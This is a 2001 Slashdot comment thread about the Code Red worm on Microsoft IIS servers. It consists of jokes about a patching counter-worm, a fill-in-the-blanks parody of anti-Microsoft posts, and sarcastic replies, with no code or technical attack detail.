      Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

      Nah, this will just make the sysadmins even lazier.

      SysAdmin #1: Dude, your NT machines are all infected with Code Red!

      SysAdmin #2: I know! I'm just waiting for them to be infected with the fix... should be any day now...
  • by RzUpAnmsCwrds ( 262647 ) on Sunday August 05, 2001 @01:15AM (#2138057)
    Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

    • > Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

      I hereby propose we adopt your post as a convention.

      We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.

      For instance, I can now describe my evening as follows:

      "IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."

    • Ha ha, that was funny! Of course we know worms never infect unix or open source systems [std.com] !
